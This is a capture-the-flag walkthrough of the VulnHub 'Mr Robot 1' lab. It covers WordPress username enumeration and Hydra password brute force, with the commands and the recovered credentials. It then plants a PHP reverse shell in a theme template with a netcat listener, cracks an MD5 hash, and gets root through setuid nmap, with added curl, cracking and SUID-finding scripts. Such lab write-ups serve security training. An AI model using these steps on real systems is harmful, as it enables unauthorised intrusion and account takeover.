# Mr Robot 1

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FTmkRB2UR1Jn95Gic5lnF%2Fimage.png?alt=media&#x26;token=76b3d667-3a18-491e-a95b-d152bb65b4ff" alt=""><figcaption></figcaption></figure></div>

You can download the target machine from [here](https://www.vulnhub.com/entry/mr-robot-1,151/).

After downloading the `mrRobot.ova` file, import it into either **VirtualBox** or **VMware**; I am using VMware.

Then change the network settings of the target machine so that it sits on the same network as your attack machine.

I have set my Kali attack machine to **`bridged`**, with the subnet <mark style="color:blue;">**192.168.11.0/24**</mark>, so I set the target machine's adapter to **`bridged`** as well. The target's IP can then be found with netdiscover:

```bash
netdiscover -i <interface> -r <IP Subnet>
```

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F2m2yvU9sgVppr8wexGhK%2Fimage.png?alt=media&#x26;token=23a071d4-3d5b-4674-8e29-20dd89a70d28" alt=""><figcaption></figcaption></figure></div>

For me the Mr Robot 1 machine's IP is 192.168.11.107.

## <mark style="color:red;">Enumeration</mark>

### <mark style="color:blue;">nmap</mark>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FCR45JlZ8XMGp0IdYjcpP%2Fimage.png?alt=media&#x26;token=4f558885-92b5-4096-9643-4aed8d5444a8" alt=""><figcaption></figcaption></figure></div>

So port 22 (SSH) is closed, and an Apache web server is listening on ports 80 and 443 (HTTP and HTTPS).

### <mark style="color:blue;">web server enumeration</mark>

Let's view what endpoints `/robots.txt` lists. It is the first file to check on any web server: it is meant to tell crawlers what not to index, so it often names exactly the paths the administrator wanted to keep out of sight.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2Fc9CCx0ZHeDOldMQMMS6w%2Fimage.png?alt=media&#x26;token=81da2e41-0173-49a2-be0b-bc7dc53d1f1a" alt=""><figcaption></figcaption></figure></div>

### <mark style="color:blue;">First Key</mark>

So the first key is in the file **`key-1-of-3.txt`**, one of the entries we found in `/robots.txt`.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FH9eT09RX4OKHGkcfIa6A%2Fimage.png?alt=media&#x26;token=701e8633-9037-4c02-af59-ee88630e5658" alt=""><figcaption></figcaption></figure></div>

Now visit `/fsocity.dic` (the name is spelled that way on the server) and a file called `fsocity.dic` is downloaded.

```bash
┌──(root㉿kali)-[/home/kali/vulnhub/mrrobot1]
└─# head fsocity.dic     
true
false
wikia
from
the
now
Wikia
extensions
scss
window
```

This looks like a custom wordlist; let's see how many words it contains.

```bash
┌──(root㉿kali)-[/home/kali/vulnhub/mrrobot1]
└─# wc -l fsocity.dic 
858160 fsocity.dic
```

858k lines is a lot for a brute force, but the list is full of repeats, so let's remove the duplicates.

```bash
┌──(root㉿kali)-[/home/kali/vulnhub/mrrobot1]
└─# sort fsocity.dic | uniq > fsocity2.dic
```

After removing the duplicates we are left with a wordlist of about 11k unique words. Let's save it for later.

```bash
┌──(root㉿kali)-[/home/kali/vulnhub/mrrobot1]
└─# wc -l fsocity2.dic                            
11451 fsocity2.dic
```
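Both of these steps, pulling the paths out of `/robots.txt` and deduplicating the wordlist, are simple enough to script. The two helpers below are an added example and not part of the original walkthrough; they read stdin, so they can be fed from `curl -s http://192.168.11.107/robots.txt` or from a saved file, and the `sort -u` they use produces the same list as the `sort | uniq` pipeline above. The robots.txt sample in the comments is constructed for the example.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: helpers for the
# robots.txt and wordlist steps. Both read stdin so they can take the output
# of curl against the target or a saved copy of the file.

# robots_paths: print the paths a robots.txt exposes. Handles CRLF endings and
# trailing "#" comments, extracts Disallow/Allow/Sitemap values, and passes
# through bare lines, because a sloppy robots.txt that just lists file names
# (no "Disallow:" keyword) still leaks them and must not be dropped.
robots_paths() {
    tr -d '\r' | sed 's/#.*$//' | awk '
        function trim(s) {
            sub(/^[[:space:]]+/, "", s); sub(/[[:space:]]+$/, "", s); return s
        }
        {
            line = $0
            if (index(line, ":") == 0) {        # no directive: bare entry
                line = trim(line)
                if (line != "") print line
                next
            }
            key = tolower(trim(substr(line, 1, index(line, ":") - 1)))
            val = trim(substr(line, index(line, ":") + 1))
            if ((key == "disallow" || key == "allow" || key == "sitemap") && val != "")
                print val
        }'
}

# clean_wordlist: same result as sort | uniq, plus two things a brute force
# needs: CRLF endings are stripped (Hydra would otherwise send a trailing \r
# with every candidate) and blank lines are dropped. LC_ALL=C makes sort
# compare bytes, so case variants such as "Wikia"/"wikia" stay distinct in
# any locale; passwords are case-sensitive, so both must be tried.
clean_wordlist() {
    tr -d '\r' | sed '/^$/d' | LC_ALL=C sort -u
}

# Typical use against the box:
#   curl -s http://192.168.11.107/robots.txt | robots_paths
#   clean_wordlist < fsocity.dic > fsocity2.dic
```

The pass-through of bare lines is deliberate: a parser that only honours well-formed `Disallow:` directives would miss entries on servers where the file was written by hand.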

### <mark style="color:blue;">Web server scanning using Nikto</mark>

```bash
┌──(root㉿kali)-[/home/kali/vulnhub/mrrobot1]
└─# nikto -host 192.168.11.107
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.11.107
+ Target Hostname:    192.168.11.107
+ Target Port:        80
+ Start Time:         2023-08-18 15:50:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.11.107/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2023-08-18 16:00:20 (GMT-4) (600 seconds)
---------------------------------------------------------------------------
```

The scan found a WordPress installation and its login page at **`/wp-login.php`**. The `x-powered-by: PHP/5.5.29` header and the `link: <...?p=23>; rel=shortlink` header are further fingerprints of an old PHP build and of WordPress respectively.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FxMqa5ugYMrYDo1z63gmm%2Fimage.png?alt=media&#x26;token=1d3ca281-75a0-4b97-af82-4cd195e6b605" alt=""><figcaption></figcaption></figure></div>

### <mark style="color:blue;">Web server directory fuzzing</mark>

We can also find the WordPress login page by fuzzing directories with gobuster or a similar tool (ffuf, dirbuster, ...). The `-b 301,404` flag blacklists those response codes from the output; keep in mind that Apache also answers a request for a real directory without its trailing slash with a 301, so if the results look thin, re-run without blacklisting 301.

```bash
gobuster dir -u http://192.168.11.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 301,404
```

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2Fv7PAIRO1KXaFffzQDnQ7%2Fimage.png?alt=media&#x26;token=37fea49b-2c56-4ea1-bad1-9394c9bd5e1b" alt=""><figcaption></figcaption></figure></div>

So if we visit **`http://192.168.11.107/login`** we are redirected to the WordPress login page.

### <mark style="color:blue;">Bruteforcing Login Page using Hydra</mark>

If we enter invalid credentials, the form says *Invalid username* when the username does not exist, and a different message when the username exists but the password is wrong. That difference is a username-enumeration oracle: we can first find valid usernames, then brute-force only the password of a user we know exists.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FqXUlfUtibzPvhHXryTGs%2Fimage.png?alt=media&#x26;token=b5b6db5f-2ed4-41ea-9820-6231a95e46fd" alt=""><figcaption></figcaption></figure></div>

Intercept the request with Burp (I used arbitrary credentials such as admin:admin) to see the exact POST parameters the form sends.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FXbNcilPyuhQt8nFdxq8r%2Fimage.png?alt=media&#x26;token=bf7a911e-9c87-4b8b-9bf0-01121a12bbf8" alt=""><figcaption></figcaption></figure></div>

Now that we know the parameters of the form, let's use **Hydra** to brute force. Remember the fsociety dictionary file: this is where it comes in handy.

```bash
hydra -L fsocity2.dic -p invalidpass 192.168.11.107 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
```

Let’s break it down:

* **-L fsocity2.dic** : Try every username from the deduplicated wordlist
* **-p invalidpass** : Use a single fixed password; its value does not matter, since we only care about the username at this stage
* **192.168.11.107** : The IP of the machine we’re attacking
* **http-post-form** : What we’re trying to brute force, here a HTTP POST form
* **‘/wp-login.php:log=^USER^\&pwd=^PASS^\&wp-submit=Log+In:F=Invalid username’**
  * **/wp-login.php** : The path to where the form is located
  * **log=^USER^\&pwd=^PASS^\&wp-submit=Log+In** : The POST parameters to send. ^USER^ and ^PASS^ are placeholders that will be replaced with the actual values.
  * **F=Invalid username** : Consider an attempt a failure (F) if the response contains the text *Invalid username*; anything else is reported as a hit, which is why the hits have to be confirmed by hand afterwards

As a result we get three hits, which are all case variants of the same account (the login form accepts the username regardless of case):

```bash
[80][http-post-form] host: 192.168.11.107   login: elliot   password: invalidpass
[80][http-post-form] host: 192.168.11.107   login: Elliot   password: invalidpass
[80][http-post-form] host: 192.168.11.107   login: ELLIOT   password: invalidpass
```

If we log in with one of those usernames and a random password, the error message changes to the wrong-password one:

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FdXC7KL3SzGDaRLSoVNIy%2Fimage.png?alt=media&#x26;token=f5f9793c-d07c-4749-b2a9-2c7e5d02e0d0" alt=""><figcaption></figcaption></figure></div>

Next let's brute-force the password of the user elliot with Hydra, this time with a fixed username (`-l`), the wordlist as the password list (`-P`) and the wrong-password message as the failure string:

```bash
hydra -l elliot -P fsocity2.dic 192.168.11.107 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
```

Hydra finds a valid password:

```bash
[80][http-post-form] host: 192.168.11.107   login: elliot   password: ER28-0652
```
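The two Hydra runs above rely on WordPress answering differently depending on whether the username exists. The following is an added example, not part of the original walkthrough and not something Hydra ships: it reproduces that check with curl and a small classifier, so the failure strings can be confirmed against a target before spending thousands of requests on it. The host, path and the two error strings are the ones used on this box; newer WordPress versions word the messages differently, so confirm them once by hand. `wp_enum_users` is a slow single-threaded stand-in for the `hydra -L` run.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: the check behind
# Hydra's F= condition, done by hand with curl.

# classify_wp_login: read a full HTTP response (headers + body, as produced by
# curl -i) on stdin and print one of:
#   success           a wordpress_logged_in_* cookie was set
#   invalid-username  the username does not exist
#   wrong-password    the username exists, the password does not match
#   unknown           none of the above (lockout plugin, changed wording, ...)
# Success is checked first: the 302 from a valid login carries no error text.
classify_wp_login() {
    resp=$(cat)
    case $resp in
        *"wordpress_logged_in_"*) echo success ;;
        *"Invalid username"*)     echo invalid-username ;;
        *"is incorrect"*)         echo wrong-password ;;
        *)                        echo unknown ;;
    esac
}

# wp_login_probe HOST USER PASS: one login attempt, classified. Same POST
# parameters as the form captured in Burp (log, pwd, wp-submit). No -L, so a
# successful 302 is returned as-is together with its Set-Cookie header.
wp_login_probe() {
    curl -s -i --max-time 10 \
        --data-urlencode "log=$2" \
        --data-urlencode "pwd=$3" \
        --data-urlencode "wp-submit=Log In" \
        "http://$1/wp-login.php" | classify_wp_login
}

# wp_enum_users HOST WORDLIST: report every candidate that is not rejected as
# an unknown username, with its classification. Equivalent to the
# hydra -L ... -p invalidpass run, one request at a time.
wp_enum_users() {
    host=$1; wordlist=$2
    while IFS= read -r u || [ -n "$u" ]; do
        [ -z "$u" ] && continue
        r=$(wp_login_probe "$host" "$u" invalidpass)
        if [ "$r" != invalid-username ]; then
            printf '%s\t%s\n' "$u" "$r"
        fi
    done < "$wordlist"
}

# Confirm the strings once by hand before any brute force; on this box:
#   wp_login_probe 192.168.11.107 doesnotexist anything   (expect invalid-username)
#   wp_login_probe 192.168.11.107 elliot anything         (expect wrong-password)
#   wp_enum_users 192.168.11.107 fsocity2.dic
```

If both manual probes come back `unknown`, the site is not answering with the strings Hydra is told to look for, and a run with `F=Invalid username` would report every candidate as a hit.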

Let's now log in with **`elliot : ER28-0652`**.

## <mark style="color:red;">Foothold as user daemon</mark>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FAqgjFQqlt5DJfuRMHp4u%2Fimage.png?alt=media&#x26;token=75fb1048-d0b8-45d7-a972-140b2ca7287a" alt=""><figcaption></figcaption></figure></div>

As you can see, we have gained access to the WordPress admin dashboard. We are not done yet, since we need access to the server itself. For that we get a reverse shell by planting a PHP reverse shell in a theme file that the server will execute.

I used the PHP reverse shell from pentestmonkey, which you can find [here](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php), and edited it with my attack machine's IP address and the port my listener will wait on.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FSEppO2uS7IUC1j9JjhDK%2Fimage.png?alt=media&#x26;token=046e9d49-d6e9-4020-a837-3031465761d1" alt=""><figcaption></figcaption></figure></div>

Now, in the dashboard's left-hand menu, click **Appearance -> Editor**.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FRYshG0OiIrDkTfRi6voa%2Fimage.png?alt=media&#x26;token=0bed9497-c8ed-4941-8107-69f98d1a9fea" alt=""><figcaption></figcaption></figure></div>

Here we can edit the theme's PHP files. We replace the contents of one template (the 404 template in this case) with our PHP reverse shell; when a page that uses this template is requested, the PHP runs on the server and connects back to us. Note that this route depends on the theme file editor being enabled: sites that define `DISALLOW_FILE_EDIT` in `wp-config.php` have no Appearance -> Editor entry, and an attacker would need another way to get PHP onto the server, such as uploading a malicious plugin.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2Fb29SoxnJAA77SZ5mGDIl%2Fimage.png?alt=media&#x26;token=c9c343ee-4302-44b4-a1fb-608717052033" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F0abOXcF4QVinm4WI1DKx%2Fimage.png?alt=media&#x26;token=58610fd0-dff9-4418-90dd-aa301dbd93b8" alt=""><figcaption></figcaption></figure></div>

After pasting the reverse shell code into the template, save it by scrolling to the bottom of the editor and clicking <mark style="color:blue;">**Update File**</mark>.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F4YU650N0HhwCjkTCA0HT%2Fimage.png?alt=media&#x26;token=bc538f1e-bde6-488e-9bae-b23b6f552798" alt=""><figcaption></figcaption></figure></div>

After this we have to trigger the PHP code by visiting <mark style="color:orange;">**<http://192.168.11.107/404.php>**</mark>. Any URL that does not exist works as well, since WordPress renders the 404 template for it.

But before doing so we have to set up a listener on the port we put in the shell:

```bash
┌──(root㉿kali)-[/home/kali]
└─# nc -nvlp 4444
listening on [any] 4444 ...
```

Now visit the link:

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FbQeg3cAQ0m9EOB7YQzNb%2Fimage.png?alt=media&#x26;token=007ccc71-b7f2-4268-8d1b-1585a8a6a4e0" alt=""><figcaption></figcaption></figure></div>

And you should receive a shell, running as the web server's user `daemon`.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FG7JhYbGmUKv0KGpjlUWs%2Fimage.png?alt=media&#x26;token=1765d5ea-9f2d-4251-9856-74e325f0ee10" alt=""><figcaption></figcaption></figure></div>

**Upgrade the shell** to a fully interactive one before moving on; the raw netcat shell has no job control, no tab completion and dies on Ctrl-C.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FN6UjqZLqbv3YLRKUIKhs%2Fimage.png?alt=media&#x26;token=042892e3-025e-4916-aa75-f7715fe8f79f" alt=""><figcaption></figcaption></figure></div>

## <mark style="color:red;">Lateral Movement -> from daemon to robot</mark>

Let's look at `/home` to see which users exist.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F22sRYmPzAvswpWZw8cLj%2Fimage.png?alt=media&#x26;token=ba413837-ee87-4724-8651-086818490d65" alt=""><figcaption></figcaption></figure></div>

So there is only the user `robot`.

His home directory holds two files: the second key, which we do not have permission to read as `daemon`, and a world-readable file containing the password hash of the user `robot`.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2Fey2WXE2JYpvDrAEnAM0E%2Fimage.png?alt=media&#x26;token=1e3fc601-33a0-4e12-b75f-0152f43473c3" alt=""><figcaption></figcaption></figure></div>

The hash type is MD5 (a raw, unsalted 32-character hex digest).

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F5G8KMdqegzG6BFgPxnAA%2Fimage.png?alt=media&#x26;token=faaf4eae-19b1-46b1-86ad-b810da872ecc" alt=""><figcaption></figcaption></figure></div>

Let's paste this hash into the online service [**crackstation**](https://crackstation.net/), which looks it up in a precomputed table. On a real engagement, crack hashes locally (hashcat, john) rather than sending client material to a third-party site.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FSY6E6ikrLCt2PyAktA6V%2Fimage.png?alt=media&#x26;token=46a71b70-4b91-4085-9bc7-e8ac8bbe78dd" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F77kfacubKuuuqgy8uUpX%2Fimage.png?alt=media&#x26;token=4df9bcc3-9562-491b-826e-1bc9fe06c213" alt=""><figcaption></figcaption></figure></div>
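As an added example, not from the walkthrough and not how crackstation works internally (that is a precomputed lookup table), here is the same dictionary attack done locally with coreutils only, so the hash never leaves your machine. The hash and wordlist in the usage comments are constructed for the example, not the ones from the box.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: a raw-MD5 dictionary
# attack with coreutils, as an offline alternative to a public lookup site.
# hashcat -m 0 or john --format=raw-md5 do the same far faster; this only makes
# the mechanism visible.

# md5_of STRING: hex MD5 of the string with no trailing newline. printf '%s'
# matters: "echo word" would hash "word\n", which is not what PHP's md5() or a
# lookup site computes.
md5_of() {
    if command -v md5sum >/dev/null 2>&1; then
        printf '%s' "$1" | md5sum | cut -d' ' -f1
    else
        printf '%s' "$1" | md5 -q          # BSD/macOS
    fi
}

# crack_raw_md5 HASH WORDLIST: print the matching word and return 0; return 1
# when the list is exhausted; return 2 when HASH is not a 32-hex raw MD5 (an
# /etc/shadow entry starting with $1$ is md5crypt, a salted, iterated format
# that this loop cannot crack).
crack_raw_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    wordlist=$2
    cr=$(printf '\r')
    case $target in
        *[!0-9a-f]* | '') echo "not a raw MD5 hash: $1" >&2; return 2 ;;
    esac
    [ ${#target} -eq 32 ] || { echo "not a raw MD5 hash: $1" >&2; return 2; }
    while IFS= read -r word || [ -n "$word" ]; do
        word=${word%"$cr"}                  # tolerate CRLF wordlists
        [ -z "$word" ] && continue
        if [ "$(md5_of "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Usage (constructed hash, the MD5 of the word "password"):
#   crack_raw_md5 5f4dcc3b5aa765d61d8327deb882cf99 fsocity2.dic
```

The format check at the top is the step people skip: a 32-hex string is raw MD5, while `$1$...` from a shadow file is md5crypt and needs a different mode in hashcat or john.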

### <mark style="color:blue;">Second Key</mark>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FKLKhN14rmDR5zXDXYE3v%2Fimage.png?alt=media&#x26;token=4e9ba4b9-802b-40ed-84d5-7bf2dda6b4d3" alt=""><figcaption></figcaption></figure></div>

## <mark style="color:red;">Privilege Escalation -> root</mark>

First let's do some enumeration with linpeas.sh.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FdYUvA5BgQmFRaEWDewSo%2Fimage.png?alt=media&#x26;token=62c842ca-4b7b-4e8a-9cb6-35e4361aadd1" alt=""><figcaption></figcaption></figure></div>

Listing all the SUID binaries on the machine, the `nmap` binary stands out: it is not setuid on a normal install, and as setuid root it can be made to spawn a shell.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FjPgiNbfrdxMdwtWewS0G%2Fimage.png?alt=media&#x26;token=7f6d9d54-39fa-44c5-a91c-79fd9aec8d8a" alt=""><figcaption></figcaption></figure></div>

The exploit is documented in GTFOBins, see [here](https://gtfobins.github.io/gtfobins/nmap/#shell): older nmap versions have an `--interactive` mode, and its `!sh` command spawns a shell that keeps the effective root UID.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FbXKiLK7rkOF1bQgR5Ixr%2Fimage.png?alt=media&#x26;token=363bf53d-69b2-4d58-93ee-d289ff5f7da4" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F0mCGtl9Vv81jPdtFsgDc%2Fimage.png?alt=media&#x26;token=73032167-05b4-4192-80d7-e3d7d1723613" alt=""><figcaption></figcaption></figure></div>
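What the linpeas SUID section boils down to, as an added example that is not part of the walkthrough nor of linpeas: a `find` for setuid files with the hits cross-referenced against a short, hand-picked subset of the binaries GTFOBins lists under "SUID". That subset is an assumption of this example, not the full GTFOBins list.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough or of linpeas: the SUID
# check done by hand, with known-abusable binaries flagged.

# find_suid [ROOT] [OWNER]: list setuid files under ROOT (default /),
# optionally only those owned by OWNER (root is the interesting case). Stays on
# one filesystem and drops errors from directories the current user cannot read.
find_suid() {
    root=${1:-/}
    if [ -n "$2" ]; then
        find "$root" -xdev -type f -perm -4000 -user "$2" 2>/dev/null
    else
        find "$root" -xdev -type f -perm -4000 2>/dev/null
    fi
}

# Basenames with a GTFOBins SUID entry (hand-picked subset, an assumption of
# this example). For nmap the entry is "nmap --interactive" followed by "!sh"
# at the nmap> prompt; that mode only exists in older releases (GTFOBins lists
# 2.02 through 5.21), so a modern nmap being setuid is far less useful.
GTFO_SUID="nmap bash sh dash find vim vi python python2 python3 perl env cp mv awk gawk less more tee"

# flag_suid: read paths on stdin, append " [gtfobins]" to the known ones.
flag_suid() {
    while IFS= read -r p; do
        b=$(basename "$p")
        hit=""
        for g in $GTFO_SUID; do
            if [ "$b" = "$g" ]; then hit=" [gtfobins]"; fi
        done
        printf '%s%s\n' "$p" "$hit"
    done
}

# Typical use on the target, after the shell upgrade:
#   find_suid / root | flag_suid
```

Anything flagged is worth a look on GTFOBins, but an unflagged custom binary with the setuid bit deserves even more attention, since nobody has documented it yet.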

### <mark style="color:blue;">Third Key</mark>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FmKWL6n2afYijJNWTYMRi%2Fimage.png?alt=media&#x26;token=d3140131-c0d1-4815-82d8-ef0542d08acb" alt=""><figcaption></figcaption></figure></div>

I hope you found this walkthrough easy to understand and follow.

Greetings from [<mark style="color:red;">**Sayonara**</mark>](https://github.com/ismail-arame)
